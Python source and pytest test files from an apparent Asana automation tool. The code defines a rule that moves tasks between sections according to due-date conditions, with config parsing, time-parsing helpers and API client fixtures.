main(**vars(parser.parse_args(_args)))
def _register_shutdown_signals(signals=None):
"""
Registers the shutdown signals that will be supported, handling any platform
dependent discrepancies gracefully.
Args:
signals ([str] or None): String of names of signals in `signal` module, or
`None` to use defaults.
"""
if signals is None:
signals = ('SIGINT', 'SIGTERM', 'SIGQUIT', 'SIGHUP')
for sig in signals:
try:
signal.signal(getattr(signal, sig), _shutdown)
except AttributeError:
logger.debug(f'Signal "{sig}" not registered for shutdown. Likely'
+ ' not supported by this OS.')
# Likely a platform didn't support one of the options
continue
def _shutdown(signum, _frame):
"""
Perform all necessary operations to cleanly shutdown when required.
This is triggered through signal interrupts as registered when this is
executed as a script.
Args:
signum (int): Number of signal received.
_frame (frame): See signal.signal python docs.
"""
msg = f'Exiting from signal {str(signum)} ...'
logger.warning(msg)
sys.exit(1)
if __name__ == '__main__': # Ignored by CodeCov
# Since no unit testing here, code kept at absolute minimum
_setup_and_call_main()
```
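Because `_setup_and_call_main()` accepts an explicit argument list (the hook its docstring reserves for unit testing), the argument wiring above can be exercised directly. A hedged sketch, assuming the package is installed and its rules/API configuration is in place; without `-e` the run stays in test-report-only mode:
```python
from asana_extensions import main as ae_main

# Dry run: report what the rules module would do, at INFO verbosity.
ae_main._setup_and_call_main(['-m', 'rules', '-l', 'info'])

# Live run: actually execute all supported modules.
# ae_main._setup_and_call_main(['-m', 'all', '-l', 'warning', '-e'])
```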
#### File: asana_extensions/rules/move_tasks_rule.py
```python
import logging
import asana
from asana_extensions.asana import client as aclient
from asana_extensions.asana import utils as autils
from asana_extensions.general import config
from asana_extensions.general.exceptions import * # pylint: disable=wildcard-import
from asana_extensions.rules import rule_meta
logger = logging.getLogger(__name__)
class MoveTasksRule(rule_meta.Rule):
"""
Rules to move tasks to the specified destination based on the specified
conditions.
Class Attributes:
N/A
Instance Attributes:
_rules_params ({str:str/int/bool/etc}): The generic dictionary that
defines the parameters for this rule.
[inherited from Rule]:
_rule_id (str): The id used as the section name in the rules conf.
_rule_type (str): The type of rule, such as "move tasks".
_test_report_only (bool): Whether or not this is for reporting for
testing only or whether rule is live.
_is_valid (bool or None): Cached value as to whether the rule is valid.
If not validated yet, will be None.
"""
def __init__(self, rule_params, **kwargs):
"""
Create the Move Tasks Rule.
Args:
rules_params ({str:str/int/bool/etc}): The generic dictionary that
defines the parameters for this rule.
See parent(s) for required kwargs.
Raises:
(AssertionError): Invalid data.
"""
super().__init__(**kwargs)
is_project_given = rule_params['project_name'] is not None \
or rule_params['project_gid'] is not None
assert rule_params['is_my_tasks_list'] is False \
or rule_params['user_task_list_gid'] is None, "Cannot" \
+ " specify 'for my tasks list' and 'user task list gid'" \
+ " together."
is_user_task_list_given = rule_params['is_my_tasks_list'] \
or rule_params['user_task_list_gid'] is not None
assert is_project_given ^ is_user_task_list_given, "Must specify to" \
+ " use a project or user task list, but not both."
assert rule_params['workspace_name'] is not None \
or rule_params['workspace_gid'] is not None, "Must specify" \
+ " workspace."
is_time_given = rule_params['min_time_until_due_str'] is not None \
or rule_params['max_time_until_due_str'] is not None
is_time_parsed = rule_params['min_time_until_due'] is not None \
or rule_params['max_time_until_due'] is not None
assert is_time_given == is_time_parsed, "Failed to parse min/max" \
+ " time until due -- check format."
assert is_time_given ^ rule_params['match_no_due_date'], "Must" \
+ " specify either min/max time until due or match no due" \
+ " date (but not both)."
self._rule_params = rule_params
@classmethod
def load_specific_from_conf(cls, rules_cp, rule_id, rule_params=None,
**kwargs):
"""
Loads the rule-specific config items for this rule from the
configparsers from files provided. Then creates the rule from the data
provided and data loaded.
Args:
rule_cp (configparser): The full configparser from the rules conf.
rule_id (str): The ID name for this rule as it appears as the
section header in the rules_cp.
rule_params ({str: str/int/bool/etc}): The rule parameters loaded from
config. Updated by super classes with their results. Final sub
class expected to be None.
Note: kwargs contains other args to pass thru to constructor.
Returns:
rule (Rule<> or None): The Rule<> object created and loaded from
config, where Rule<> is a subclass of Rule (e.g. MoveTasksRule).
Will return None if failed to load and create due to invalid config.
Abstract parent classes such as Rule will return None.
Raises:
(AssertionError): Invalid data.
"""
assert rule_params is None, "Should not pass anything in for" \
+ " `rule_params`"
try:
rule_params = {}
super_params = {}
super().load_specific_from_conf(rules_cp, rule_id, super_params,
**kwargs)
rule_params['project_name'] = rules_cp.get(rule_id, 'project name',
fallback=None)
rule_params['project_gid'] = rules_cp.getint(rule_id, 'project gid',
fallback=None)
rule_params['is_my_tasks_list'] = rules_cp.getboolean(rule_id,
'for my tasks list', fallback=None)
rule_params['user_task_list_gid'] = rules_cp.getint(rule_id,
'user task list id', fallback=None)
rule_params['workspace_name'] = rules_cp.get(rule_id,
'workspace name', fallback=None)
rule_params['workspace_gid'] = rules_cp.getint(rule_id,
'workspace gid', fallback=None)
rule_params['match_no_due_date'] = rules_cp.getboolean(rule_id,
'no due date', fallback=False)
rule_params['min_time_until_due_str'] = rules_cp.get(rule_id,
'min time until due', fallback=None)
rule_params['min_time_until_due'] = cls.parse_timedelta_arg(
rule_params['min_time_until_due_str'])
rule_params['max_time_until_due_str'] = rules_cp.get(rule_id,
'max time until due', fallback=None)
rule_params['max_time_until_due'] = cls.parse_timedelta_arg(
rule_params['max_time_until_due_str'])
rule_params['min_due_assumed_time_str'] = rules_cp.get(rule_id,
'assumed time for min due', fallback=None)
rule_params['min_due_assumed_time'] = cls.parse_time_arg(
rule_params['min_due_assumed_time_str'], None)
rule_params['max_due_assumed_time_str'] = rules_cp.get(rule_id,
'assumed time for max due', fallback=None)
rule_params['max_due_assumed_time'] = cls.parse_time_arg(
rule_params['max_due_assumed_time_str'], None)
rule_params['src_sections_include_names'] = \
config.parse_list_from_conf_string(rules_cp.get(rule_id,
'src sections include names', fallback=None),
config.CastType.STRING, delim=None, delim_newlines=True,
strip_quotes=True)
rule_params['src_sections_include_gids'] = \
config.parse_list_from_conf_string(rules_cp.get(rule_id,
'src sections include gids', fallback=None),
config.CastType.INT, delim_newlines=True)
rule_params['src_sections_exclude_names'] = \
config.parse_list_from_conf_string(rules_cp.get(rule_id,
'src sections exclude names', fallback=None),
config.CastType.STRING, delim=None, delim_newlines=True,
strip_quotes=True)
rule_params['src_sections_exclude_gids'] = \
config.parse_list_from_conf_string(rules_cp.get(rule_id,
'src sections exclude gids', fallback=None),
config.CastType.INT, delim_newlines=True)
rule_params['dst_section_name'] = rules_cp.get(rule_id,
'dst section name', fallback=None)
rule_params['dst_section_gid'] = rules_cp.getint(rule_id,
'dst section gid', fallback=None)
except config.UnsupportedFormatError as ex:
logger.error('Failed to parse Move Tasks Rule from config. Check'
+ f' time args. Exception: {str(ex)}')
return None
except KeyError as ex:
logger.error('Failed to parse Move Tasks Rule from config. Check'
+ f' keys. Exception: {str(ex)}')
return None
except TimeframeArgDupeError as ex:
logger.error('Failed to parse Move Tasks Rule from config. Check'
+ f' timeframe args. Exception: {str(ex)}')
return None
except ValueError as ex:
logger.error('Failed to parse Move Tasks Rule from config. Check'
+ f' strong typed values. Exception: {str(ex)}')
return None
try:
rule = cls(rule_params, **kwargs, **super_params, rule_id=rule_id)
return rule
except AssertionError as ex:
logger.error(f'Failed to create Move Tasks Rule from config: {ex}')
return None
@classmethod
def get_rule_type_names(cls):
"""
Get the list of names that can be used as the 'rule type' in the rules
conf to identify this rule.
Returns:
([str]): A list of names that are valid to use as the type for this
rule.
"""
# pylint: disable=multi-line-list-first-line-item
# pylint: disable=multi-line-list-eol-close, closing-comma
return ['move tasks', 'auto-promote tasks', 'auto-promote',
'auto promote tasks', 'auto promote', 'promote tasks']
def _sync_and_validate_with_api(self):
"""
Sync configuration data with the API and further validate, storing any
newly prepared configuration info.
Returns:
(bool): True if completed successfully; False if failed for any
reason (this should probably catch nearly all exceptions).
"""
rps = self._rule_params # Shorten name since used so much here
try:
if rps['workspace_name'] is not None:
rps['workspace_gid'] = aclient.get_workspace_gid_from_name(
rps['workspace_name'], rps['workspace_gid'])
if rps['project_name'] is not None:
# For now, hardcoded for non-archived project
# Could use None, but workaround for now is to specify by gid
rps['project_gid'] = aclient.get_project_gid_from_name(
rps['workspace_gid'], rps['project_name'],
rps['project_gid'])
if rps['is_my_tasks_list']:
rps['user_task_list_gid'] = aclient.get_user_task_list_gid(
rps['workspace_gid'], True)
if rps['project_gid'] is not None:
rps['effective_project_gid'] = rps['project_gid']
elif rps['user_task_list_gid'] is not None:
rps['effective_project_gid'] = rps['user_task_list_gid']
# Else, shouldn't be possible based on assertions in __init__()
# Always want to default to include for move task rule
rps['src_net_include_section_gids'] = \
autils.get_net_include_section_gids(
rps['effective_project_gid'],
rps['src_sections_include_names'],
rps['src_sections_include_gids'],
rps['src_sections_exclude_names'],
rps['src_sections_exclude_gids'])
if rps['dst_section_name'] is not None:
rps['dst_section_gid'] = aclient.get_section_gid_from_name(
rps['effective_project_gid'], rps['dst_section_name'],
rps['dst_section_gid'])
except (asana.error.AsanaError, aclient.ClientCreationError,
aclient.DataNotFoundError, aclient.DuplicateNameError,
aclient.MismatchedDataError, autils.DataConflictError,
autils.DataMissingError) as ex:
logger.error(f'Failed to sync and validate rule "{self._rule_id}"'
+ f' with the API. Skipping rule. Exception: {str(ex)}')
return False
return True
def execute(self, force_test_report_only=False):
"""
Execute the rule. This should likely check if it is valid and the
criteria to run the rule has been met (if any). If either the rule is
set to test report only or the caller of this method specified to force
to be test report only, no changes will be made via the API -- only
simulated results will be reported (but still based on data from API).
This should ideally catch all errors except ones so catastrophic that
the operation of the entire app should cease immediately. Callers of
this method are not intended to require try/except handling for things
like mis-configured rules, etc.
Args:
force_test_report_only (bool): If True, will ensure this runs as a
test report only with no changes made via the API; if False, will
defer to the `_test_report_only` setting of the rule.
Returns:
(bool): True if fully completed without any errors; False any errors,
regardless of whether it resulted in partial or full failure.
"""
if not self.is_valid():
logger.error(f'Failed to execute "{self._rule_id}" since invalid.')
return False
if not self.is_criteria_met():
logger.info(f'Skipping execution of "{self._rule_id}" completely'
+ ' since criteria not met.')
return False
any_errors = False
rps = self._rule_params # Shorten name since used so much here
tasks_to_move = []
for src_sect_gid in rps['src_net_include_section_gids']:
# Could lock in a dt_base before loop, but likely not an issue
# For now, hardcoded for incomplete tasks
try:
tasks_to_move.extend(autils.get_filtered_tasks(src_sect_gid,
rps['match_no_due_date'],
rps['min_time_until_due'], rps['max_time_until_due'],
rps['min_due_assumed_time'],
rps['max_due_assumed_time']))
except (asana.error.AsanaError, aclient.ClientCreationError) as ex:
logger.error(f'Failed to filter tasks for "{self._rule_id}"'
+ f' in section [{src_sect_gid}]. Skipping section.'
+ f' Exception: {str(ex)}')
any_errors = True
for task in tasks_to_move[::-1]:
# For now, hardcoded to move to top, maintaining order
if self._test_report_only or force_test_report_only:
msg = '[Test Report Only] For MoveTasksRule'
msg += f' "{self._rule_id}", would have moved task'
msg += f' "{task["name"]}" [{task["gid"]}]'
msg += ' to top of section'
if rps['dst_section_name'] is not None:
msg += f' "{rps["dst_section_name"]}"'
msg += f' [{rps["dst_section_gid"]}].'
logger.info(msg)
else:
try:
aclient.move_task_to_section(task['gid'],
rps['dst_section_gid'])
msg = f'Successfully moved task "{task["name"]}"'
msg += f' [{task["gid"]}] to section'
if rps['dst_section_name'] is not None:
msg += f' "{rps["dst_section_name"]}"'
msg += f' [{rps["dst_section_gid"]}] per "{self._rule_id}".'
logger.info(msg)
except (asana.error.AsanaError,
aclient.ClientCreationError) as ex:
msg = f'Failed to move task "{task["name"]}"'
msg += f' [{task["gid"]}] to section'
if rps['dst_section_name'] is not None:
msg += f' "{rps["dst_section_name"]}"'
msg += f' [{rps["dst_section_gid"]}] for "{self._rule_id}".'
msg += f' Skipping task. Exception: {str(ex)}'
logger.error(msg)
any_errors = True
return not any_errors
```
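For reference, the option names read in `load_specific_from_conf()` above map onto a rules-config section roughly like the following. This is a hedged sketch: the rule, workspace and section names are placeholders, and it assumes the config helpers tolerate unspecified keys (as the `fallback=None` handling implies) and that `parse_timedelta_arg(None)`/`parse_time_arg(None, ...)` return `None`:
```python
import configparser
from asana_extensions.rules.move_tasks_rule import MoveTasksRule

RULES_CONF = """
[promote untimed tasks]
rule type = move tasks
for my tasks list = yes
workspace name = My Workspace
no due date = yes
dst section name = Today
test report only = yes
"""

rules_cp = configparser.ConfigParser()
rules_cp.read_string(RULES_CONF)
rule = MoveTasksRule.load_specific_from_conf(rules_cp, 'promote untimed tasks')
print(rule.get_rule_id() if rule else 'failed to load')
```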
#### File: asana_extensions/rules/rule_meta.py
```python
from abc import ABC, abstractmethod
import datetime as dt
import logging
import re
import string
from dateutil.relativedelta import relativedelta
from asana_extensions.general import config
from asana_extensions.general.exceptions import * # pylint: disable=wildcard-import
logger = logging.getLogger(__name__)
class Rule(ABC):
"""
The abstract class for all automation rule functionality. Each rule type
will subclass this, but externally will likely only call the generic methods
defined here to unify the interface.
This serves as a base class for other rules, so will consume any final
kwargs.
Class Attributes:
N/A
Instance Attributes:
_rule_id (str): The id used as the section name in the rules conf.
_rule_type (str): The type of rule, such as "move tasks".
_test_report_only (bool): Whether or not this is for reporting for
testing only or whether rule is live.
_is_valid (bool or None): Cached value as to whether the rule is valid.
If not validated yet, will be None.
"""
def __init__(self, rule_id, rule_type, test_report_only, **kwargs):
"""
Creates the rule.
Args:
rule_id (str): The id used as the section name in the rules conf.
rule_type (str): The type of rule, such as "move tasks".
test_report_only (bool): Whether or not this is for reporting for
testing only or whether rule is live.
kwargs ({}): Should be empty since this is the base class. Will log
warning if not empty.
"""
self._rule_id = rule_id
self._rule_type = rule_type
self._test_report_only = test_report_only
if kwargs:
logger.warning('Discarded excess kwargs provided to'
+ f' {self.__class__.__name__}: {", ".join(kwargs.keys())}')
self._is_valid = None
@classmethod
@abstractmethod
def load_specific_from_conf(cls, rules_cp, rule_id, rule_params=None,
**kwargs):
"""
Loads the rule-specific config items for this rule from the
configparsers from files provided. Then creates the rule from the data
provided and data loaded.
Args:
rules_cp (configparser): The full configparser from the rules conf.
rule_id (str): The ID name for this rule as it appears as the
section header in the rules_cp.
rule_params ({str: str/int/bool/etc}): The rule parameters loaded from
config so far. Subclasses pass this in to be updated with the results
loaded here; it must not be None when calling this parent implementation.
Note: kwargs contains other args to pass thru to constructor.
Returns:
rule (Rule<> or None): The Rule<> object created and loaded from
config, where Rule<> is a subclass of Rule (e.g. MoveTasksRule).
Will return None if failed to load and create due to invalid config.
Abstract parent classes such as Rule will return None.
Raises:
(AssertionError): Invalid data.
(KeyError): Missing critical config keys.
"""
assert rule_params is not None, "Subclass must provide `rule_params`."
try:
rule_params['rule_type'] = rules_cp[rule_id]['rule type']
rule_params['test_report_only'] = rules_cp.getboolean(rule_id,
'test report only', fallback=None)
except KeyError as ex:
logger.error('Failed to parse Rule from config. Check keys.'
+ f' Exception: {str(ex)}')
raise
except ValueError as ex:
logger.error('Failed to parse Rule from config. Check strongly typed'
+ f' values. Exception: {str(ex)}')
raise
def get_rule_id(self):
"""
Get the id/name of this rule.
Returns:
_rule_id (str): The ID or name of this rule.
"""
return self._rule_id
@classmethod
@abstractmethod
def get_rule_type_names(cls):
"""
Get the list of names that can be used as the 'rule type' in the rules
conf to identify this rule.
Returns:
([str]): A list of names that are valid to use as the type for this
rule.
"""
@abstractmethod
def _sync_and_validate_with_api(self):
"""
Sync configuration data with the API and further validate, storing any
newly prepared configuration info. This is largely a continuation
of __init__() where API-dependent items can be completed in case it is
ideal to decouple the API access from __init__().
Returns:
(bool): True if completed successfully; False if failed for any
reason (this should probably catch nearly all exceptions).
"""
def is_valid(self):
"""
Check whether this rule is valid or not. This ideally utilizes a cached
value so that the check for being valid does not need to be done more
than once since that could involve heavy API access. As a result, it is
likely that this should call `_sync_and_validate_with_api()`. In most
cases, can just rely on the logic in this metaclass.
Returns:
(bool): True if is valid; False if invalid.
"""
if self._is_valid is None:
self._is_valid = self._sync_and_validate_with_api()
return self._is_valid
def is_criteria_met(self): # pylint: disable=no-self-use
"""
Checks whether the criteria to run this rule, if any, has been met. If
any additional processing is required for this, it should be done and
stored as appropriate. In such a case, it may be advisable to cache
the overall result.
Where possible, this should be decoupled from `is_valid()`, but in many
cases it will likely make sense for this to only run if `is_valid()` is
True. Hence, this may get masked by that result in those cases.
Some rules do not have any specific criteria as to whether the rule
should run (e.g. no specific datetime at which it should run if script
expected to be called multiple times), in which case this should just
return True.
If a rule does need to implement a criteria check, this should be
overridden.
Returns:
(bool): True if criteria is met for rule to run or there is no
criteria (i.e. this is not applicable); False if not ready to run.
"""
return True
@abstractmethod
def execute(self, force_test_report_only=False):
"""
Execute the rule. This should likely check if it is valid and the
criteria to run the rule has been met (if any). If either the rule is
set to test report only or the caller of this method specified to force
to be test report only, no changes will be made via the API -- only
simulated results will be reported (but still based on data from API).
This should ideally catch all errors except ones so catastrophic that
the operation of the entire app should cease immediately. Callers of
this method are not intended to require try/except handling for things
like mis-configured rules, etc.
Args:
force_test_report_only (bool): If True, will ensure this runs as a
test report only with no changes made via the API; if False, will
defer to the `_test_report_only` setting of the rule.
Returns:
(bool): True if fully completed without any errors; False if any errors
occurred, regardless of whether they resulted in partial or full failure.
"""
@classmethod
def parse_time_arg(cls, t_str, is_tz_required=False):
"""
Parses a simple ISO format time string. This does NOT support the
exhaustive ISO 8601 format.
Args:
t_str (str or None): The string to parse a time value. None allowed
for convenience.
is_tz_required (bool or None): Whether the time string is required to
have timezone information. True and False mean required and not
required, respectively. If None, it is required that the timezone
is NOT provided at all.
Returns:
time_parsed (time or None): The time object parsed from the time
string provided, with the timezone enforced as specified. If None
or empty string provided, None returned.
Raises:
(config.UnsupportedFormatError): Raised if timezone information is
incompatible between the time string provided and the timezone
requirement specified. Specifically, this is raised if timezone is
required and there is no timezone parsed from the string; or if
timezone is prohibited (None) and there is a timezone parsed from
the string.
(ValueError): Raised if not a valid ISO format time string.
"""
assert is_tz_required is True or is_tz_required is False \
or is_tz_required is None, \
'`is_tz_required` must be bool or None'
if t_str is None or t_str == '':
return None
time_parsed = dt.time.fromisoformat(t_str)
if is_tz_required is True and time_parsed.tzinfo is None:
raise config.UnsupportedFormatError('Timezone required for time'
+ f" string, but none found. String: '{t_str}',"
+ f' parsed: `{time_parsed}`')
if is_tz_required is None and time_parsed.tzinfo is not None:
raise config.UnsupportedFormatError('Timezone prohibited for time'
+ f" string, but one was provided. String: '{t_str}',"
+ f' parsed: `{time_parsed}`')
return time_parsed
@classmethod
def parse_timedelta_arg(cls, arg_str):
"""
Parses a timedelta argument as might be specified in a config file.
Possible timeframes to specify (with case-sensitive abbreviations in
parentheses) are:
(m) minutes
(h) hours
(d) days
(w) weeks
(M) Months
(y) years
Short names are case sensitive; full names are not.
Months and years will be converted per dateutil.relativedelta's
handling. If ever changed, the intention will be that months and years
will be converted to days with respect to today. If used in combination
with other items, such as days, those will be added AFTER converting
months/years to days.
Args:
arg_str (str or None): The string to parse. Can be None for caller's
convenience.
Returns:
(relativedelta or None): The relative datetime delta specified by the
string. If None or empty string passed in, None is returned.
Raises:
Will pass thru any exceptions raised from timeframe parser.
"""
if arg_str is None or arg_str == '':
return None
kwargs = {}
kwargs['minutes'] = cls.parse_timeframe(arg_str,
{'minutes?': False, 'm': True})
kwargs['hours'] = cls.parse_timeframe(arg_str,
{'hours?': False, 'h': True})
kwargs['days'] = cls.parse_timeframe(arg_str,
{'days?': False, 'd': True})
kwargs['weeks'] = cls.parse_timeframe(arg_str,
{'weeks?': False, 'w': True})
kwargs['months'] = cls.parse_timeframe(arg_str,
{'months?': False, 'M': True})
kwargs['years'] = cls.parse_timeframe(arg_str,
{'years?': False, 'y': True})
return relativedelta(**kwargs)
@classmethod
def parse_timeframe(cls, tf_str, timeframes):
"""
Parses a specific timeframe indicator from a string. A collection of
possible ways that timeframe can be specified can be given in regex
format (must be string Template compatible). Each can specify whether
case sensitive or not.
Exactly 1 match is expected. If no matches, will return 0; more than 1 is
considered an error condition.
Args:
tf_str (str): The string to search for timeframe indicators.
timeframes ({str:bool}): Timeframe indicators to search in string,
where the regex strings to search are the keys and the bool value
is whether or not it is case sensitive (True == case sensitive).
Returns:
(int): The number specified with the timeframe if exactly 1 match
found; 0 if no matches.
Raises:
(TimeframeArgDupeError): More than 1 match found.
"""
# Pattern is generally:
# Start of line; or whitespace, letter, or comma (look behind)
# Possible plus/neg sign and definitely digits
# Possible 1 whitespace
# <letter or word> depending on time keyword, word could have s at end
# Whitespace, neg/plus sign, digit, comma, or end of line
# (without consuming)
# Note double $$ used for end of line since written as Template
ptn_template = string.Template(r'(^|(?<=\s|[a-z]|[A-Z]|,))'
+ r'(?P<num>(\+|-)?\d+)\s?' + '$timeframe'
+ r'(?=\s|-|\d|,|\+|$$)')
ptns = []
for timeframe, case_sensitive in timeframes.items():
regex_str = ptn_template.substitute(timeframe=timeframe)
if case_sensitive:
ptn = re.compile(regex_str, re.MULTILINE)
else:
ptn = re.compile(regex_str, re.MULTILINE | re.IGNORECASE)
ptns.append(ptn)
matches = []
for ptn in ptns:
matches.extend(ptn.finditer(tf_str))
if len(matches) == 0:
return 0
if len(matches) > 1:
raise TimeframeArgDupeError('Could not parse time frame - Found'
+ f' {len(matches)} entries for'
+ f' {"/".join(timeframes.keys())} when only 0-1 allowed.')
return int(matches[0].group('num'))
```
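The time parsing classmethods above accept free-form strings such as '1w 2d'. A short usage sketch; the import path matches this file, and the example values simply follow the abbreviations documented in `parse_timedelta_arg()`:
```python
# Hedged usage sketch of the Rule classmethods defined above.
from asana_extensions.rules import rule_meta

# "1w 2d" -> relativedelta(weeks=+1, days=+2); note "M" (months) is case sensitive.
delta = rule_meta.Rule.parse_timedelta_arg('1w 2d')

# A single timeframe can be extracted directly; returns 0 if not present.
days = rule_meta.Rule.parse_timeframe('1w 2d', {'days?': False, 'd': True})  # 2

# ISO time string with timezone required; '17:00:00' alone would raise
# config.UnsupportedFormatError here.
start = rule_meta.Rule.parse_time_arg('17:00:00+00:00', is_tz_required=True)
```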
#### File: unit/asana/test_client.py
```python
import logging
import types
import uuid
import warnings
import asana
import pytest
from asana_extensions.asana import client as aclient
from asana_extensions.general import config
from tests.exceptions import * # pylint: disable=wildcard-import
from tests.unit.asana import tester_data
@pytest.fixture(name='raise_asana_error')
def fixture_raise_asana_error(request):
"""
Returns a function that can be used to mock a call, simply forcing it to
raise a marked `AsanaError` sub-error. If no marker, will use a default
exception type.
"""
marker = request.node.get_closest_marker('asana_error_data')
if marker is None:
exception_type = asana.error.InvalidRequestError # Arbitrary
else:
exception_type = marker.args[0]
def mock_raise(*args, **kwargs):
"""
Simply raise the desired error.
"""
raise exception_type
return mock_raise
@pytest.fixture(name='project_test', scope='session')
def fixture_project_test():
"""
Creates a test project and returns the dict of data that should match the
'data' element returned by the API.
Will delete the project once done with all tests.
This is not being used with the autouse keyword so that, if running tests
that do not require this project fixture, they can run more optimally
without the need to needlessly create and delete this project. (Also,
could not figure out how to get rid of all syntax and pylint errors).
** Consumes 3 API calls. **
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
proj_name = tester_data._PROJECT_TEMPLATE.substitute({'pid': uuid.uuid4()})
client = aclient._get_client()
ws_gid = aclient.get_workspace_gid_from_name(tester_data._WORKSPACE)
me_data = aclient._get_me()
params = {
'name': proj_name,
'owner': me_data['gid'],
}
proj_data = client.projects.create_project_for_workspace(str(ws_gid),
params)
yield proj_data
client.projects.delete_project(proj_data['gid'])
@pytest.fixture(name='sections_in_project_test', scope='session')
def fixture_sections_in_project_test(project_test):
"""
Creates some test sections in the test project and returns a list of them,
each of which is the dict of data that should match the `data` element
returned by the API.
Will delete the sections once done with all tests.
This is not being used with the autouse keyword so that, if running tests
that do not require this section fixture, they can run more optimally
without the need to needlessly create and delete this section. (Also,
could not figure out how to get rid of all syntax and pylint errors).
** Consumes 5 API calls. **
(API call count is 2*num_sects + 1)
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
num_sects = 2
client = aclient._get_client()
me_data = aclient._get_me()
sect_data_list = []
for _ in range(num_sects):
sect_name = tester_data._SECTION_TEMPLATE.substitute(
{'sid': uuid.uuid4()})
params = {
'name': sect_name,
'owner': me_data['gid'],
}
sect_data = client.sections.create_section_for_project(
project_test['gid'], params)
sect_data_list.append(sect_data)
yield sect_data_list
for sect_data in sect_data_list:
client.sections.delete_section(sect_data['gid'])
@pytest.fixture(name='tasks_in_project_and_utl_test', scope='session')
def fixture_tasks_in_project_and_utl_test(project_test,
sections_in_project_test, sections_in_utl_test):
"""
Creates some tasks in both the user task list (in the test workspace) and
the test project, and returns a list of them, each of which is the dict of
data that should match the `data` element returned by the API. The tasks
in the user task list and the test project are the same tasks.
This differs from the `fixture_tasks_movable_in_project_and_utl_test()` in
that these are expected to not be altered.
Will delete the tasks once done with all tests.
This is not being used with the autouse keyword so that, if running tests
that do not require this section fixture, they can run more optimally
without the need to needlessly create and delete this section. (Also,
could not figure out how to get rid of all syntax and pylint errors).
** Consumes 7 API calls. **
(API call count is 3*num_tasks + 1)
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
num_tasks = 2
client = aclient._get_client()
me_data = aclient._get_me()
task_data_list = []
for _ in range(num_tasks):
task_name = tester_data._TASK_TEMPLATE.substitute({'tid': uuid.uuid4()})
params = {
'assignee': me_data['gid'],
'assignee_section': sections_in_utl_test[0]['gid'],
'name': task_name,
'projects': [
project_test['gid'],
],
}
task_data = client.tasks.create_task(params)
task_data_list.append(task_data)
# No way to add project section at task creation, so need separate call
params = {
'task': task_data['gid'],
}
client.sections.add_task_for_section(sections_in_project_test[0]['gid'],
params)
yield task_data_list
for task_data in task_data_list:
client.tasks.delete_task(task_data['gid'])
@pytest.fixture(name='tasks_movable_in_project_and_utl_test', scope='session')
def fixture_tasks_movable_in_project_and_utl_test(project_test,
sections_in_project_test, sections_in_utl_test):
"""
Creates some tasks in both the user task list (in the test workspace) and
the test project, and returns a list of them, each of which is the dict of
data that should match the `data` element returned by the API. The tasks
in the user task list and the test project are the same tasks.
This differs from the `fixture_tasks_in_project_and_utl_test()` in that
these are expected to be movable. As such, this should only be used by
tests that factor in this moving. If multiple test functions use this
fixture, some sort of ordering of dependencies is likely required.
Will delete the tasks once done with all tests.
This is not being used with the autouse keyword so that, if running tests
that do not require this section fixture, they can run more optimally
without the need to needlessly create and delete this section. (Also,
could not figure out how to get rid of all syntax and pylint errors).
** Consumes 10 API calls. **
(API call count is 3*num_tasks + 1)
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
num_tasks = 3
client = aclient._get_client()
me_data = aclient._get_me()
task_data_list = []
for i_task in range(num_tasks):
task_name = tester_data._TASK_TEMPLATE.substitute({'tid': uuid.uuid4()})
i_sect = 0
if i_task >= 2:
i_sect = 1
params = {
'assignee': me_data['gid'],
'assignee_section': sections_in_utl_test[i_sect]['gid'],
'name': task_name,
'projects': [
project_test['gid'],
],
}
task_data = client.tasks.create_task(params)
task_data_list.append(task_data)
# No way to add project section at task creation, so need separate call
params = {
'task': task_data['gid'],
}
client.sections.add_task_for_section(
sections_in_project_test[i_sect]['gid'], params)
yield task_data_list
for task_data in task_data_list:
client.tasks.delete_task(task_data['gid'])
def filter_result_for_test(found_data, allowed_data, match_key,
key_by_index=False):
"""
The asana API often returns iterators of results. In this test module, many
results are first filtered by the allowable values so that any additional
items that may have been added by other tests do not conflate test results.
This only works for single-depth `match_key`s, so, for example, it can check
the 'gid' key if task data is supplied, but it couldn't check the 'gid' of
the first project in the list of projects in that task data.
Args:
found_data ([{str:any}]): The list of data returned by the asana API for
a query. This is likely really a single-iteration generator, but either
will be compatible.
allowed_data ([{str:any}]): The list of data that is "allowed" to be in
the `found_data`. All other data in `found_data` will be excluded.
match_key (str/int): The key to match in each item of the `found_data` and
`allowed_data`. Probably should be a string, but no reason it couldn't
be an int if you know what you are doing.
key_by_index (bool): Whether the results should be a dict keyed by the
index of the allowed data item (True) or whether a simple ordered list
should be returned (False).
Returns:
filt_data ([{str:any}]/{int:{str:any}}): The `found_data` that was present
in the `allowed_data`. This will be a dict indexed by the corresponding
index number of the matching `allowed_data` entry if `key_by_index` is
True; otherwise will be a list in the order of the `found_data` (which
would be the order provided by the API if this is directly from an
asana API query).
"""
if key_by_index:
filt_data = {}
else:
filt_data = []
# Nested fors must be in this order - expect found_data is a single-iter gen
for found_item in found_data:
for i_allowed_item, allowed_item in enumerate(allowed_data):
if found_item[match_key] == allowed_item[match_key]:
if key_by_index:
filt_data[i_allowed_item] = found_item
else:
filt_data.append(found_item)
break
return filt_data
def subtest_asana_error_handler_func(caplog, exception_type, log_index, func,
*args, **kwargs):
"""
Executes a subtest to confirm `@asana_error_handler` is properly decorating
the given function. This allows tests for the given functions to set up
anything function-specific required prior to running these same test steps.
Expected to be called by every function that uses the `@asana_error_handler`
decorator.
Args:
caplog (Caplog): The caplog fixture from the pytest test.
exception_type (AsanaError): The exact exception type that is expected to
be caught. Can be as generic as `AsanaError`, but testing for something
more specific is better to improve coverage.
log_index (int): The index to check in caplog for the desired exception
log message.
func (function): The reference to the function to call to test.
*args ([any]): The positional arguments to pass to the function to test
`func`.
**kwargs ({str:any}): The keyword arguments to pass to the function to
test `func`.
"""
caplog.clear()
with pytest.raises(exception_type):
func(*args, **kwargs)
assert caplog.record_tuples[log_index][0] == 'asana_extensions.asana.client'
assert caplog.record_tuples[log_index][1] == logging.ERROR
assert 'API query failed' in caplog.messages[log_index]
@pytest.mark.no_warnings_only
def test_logging_capture_warnings(caplog):
"""
This tests that the `logging.captureWarnings(True)` line has been executed
in the `aclient` module.
This must be run with the `-p no:warnings` option provided to `pytest`. As
a result, it is skipped by default. See `/conftest.py` for options.
"""
caplog.set_level(logging.WARNING)
caplog.clear()
warnings.warn('Test warning')
assert caplog.record_tuples[0][0] == 'py.warnings'
assert caplog.record_tuples[0][1] == logging.WARNING
